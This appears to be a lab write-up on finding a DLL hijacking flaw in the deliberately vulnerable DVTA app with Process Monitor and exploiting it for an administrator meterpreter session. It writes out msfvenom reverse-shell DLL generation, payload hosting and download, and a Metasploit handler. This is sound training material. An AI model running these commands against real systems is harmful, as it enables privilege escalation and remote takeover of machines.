Finding and Exploiting DLL Hijacking Vulnerabilities

---

Discovering DLL Hijacking Vulnerabilities Using Process Monitor

In this lab, we delve into the intricacies of identifying and exploiting DLL Hijacking vulnerabilities using Process Monitor on a Windows environment. This exercise will equip you with the skills to uncover security weaknesses that could potentially lead to privilege escalation.

Lab Environment

You will need access to:

• Kali Linux GUI instance
• Windows machine (Administrator access for application analysis and Student access for privilege escalation)

Objective

Identify a DLL Hijacking vulnerability in the DVTA application (located at C:\Users\Administrator\Desktop\dvta\bin\Release\DVTA.exe) and gain a meterpreter session with administrator privileges.

Tools Required

• Process Monitor
• Metasploit Framework

Lab Steps

Step 1: Accessing the Lab

Ensure you have access to both the Kali Linux instance and the Windows machine provided.

Step 2: Manual Analysis with Process Monitor

Process Monitor is a powerful tool from Windows Sysinternals that monitors and displays real-time file system activity, helping in identifying missing DLLs and application behavior.

• Launch Process Monitor on the Windows machine.

Step 3: Running DVTA Application

Start the DVTA.exe application from its location:

C:\Users\Administrator\Desktop\dvta\bin\Release\DVTA.exe

Monitor the process in Process Monitor to capture all file system activities related to DVTA.exe.

Step 4: Identifying Missing DLLs

Apply a filter to monitor “CreateFile” operations to identify “NAME NOT FOUND” results, indicating missing DLLs that DVTA.exe attempts to load.

• Set a filter for “CreateFile” → Include ‘CreateFile’ operations.

Step 5: Verifying Write Permissions

Ensure the Student user (PRIVILEGE-ESCAL\student) has full control permissions over the DVTA application directory:

Get-ACL 'C:\Users\Administrator\Desktop\dvta\bin\Release' | Format-List

This step confirms the ability to write a malicious DLL to the directory.

Step 6: Exploiting the Vulnerability

Generate a malicious DLL using Metasploit Framework’s msfvenom, targeting a reverse TCP meterpreter shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.2 LPORT=4444 -f dll > Dwrite.dll

Start a Python HTTP server on Kali to host the malicious DLL:

python -m SimpleHTTPServer 80

Step 7: Executing the Attack

• Download the generated Dwrite.dll onto the Windows machine at the DVTA application directory:

iwr -UseBasicParsing -Uri http://10.10.15.2/Dwrite.dll -OutFile C:\Users\Administrator\Desktop\dvta\bin\Release\Dwrite.dll

Step 8: Initiating Meterpreter Session

Launch Metasploit multi-handler to receive the meterpreter session:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.15.2
set LPORT 4444
exploit

Step 9: Triggering the Exploit

Run the DVTA.exe application on the Windows machine, which will attempt to load the malicious Dwrite.dll, triggering the meterpreter session.

Conclusion

In this lab, we navigated through the process of manual analysis using Process Monitor to discover a DLL Hijacking vulnerability in DVTA.exe. By leveraging Metasploit Framework, we crafted a malicious DLL and exploited the vulnerability to gain a privileged meterpreter session. This exercise highlights the importance of understanding application behavior and security implications associated with DLL loading mechanisms.

References

• Process Monitor Documentation
• Metasploit Framework
• DVTA GitHub Repository

This lab not only enhances your technical proficiency but also provides practical insights into securing applications against DLL Hijacking attacks. Stay vigilant and keep exploring new techniques to bolster your cybersecurity expertise.

Note: Blog based on publicly available information.